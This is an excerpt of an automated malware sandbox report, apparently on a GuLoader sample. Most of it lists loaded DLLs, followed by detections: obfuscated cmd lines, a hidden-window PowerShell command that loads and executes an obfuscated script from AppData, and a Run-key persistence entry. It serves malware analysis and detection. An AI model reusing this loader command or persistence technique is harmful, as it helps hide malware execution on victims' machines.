Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: riched20.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sti.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: napinsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: pnrpnsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wshbth.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: nlaapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winrnr.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sti.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000000F.00000002.2205196768.000000000F541000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1641973533.000000000E71D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"

Suspicious powershell command line found

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udbygningerne230
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udbygningerne230

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
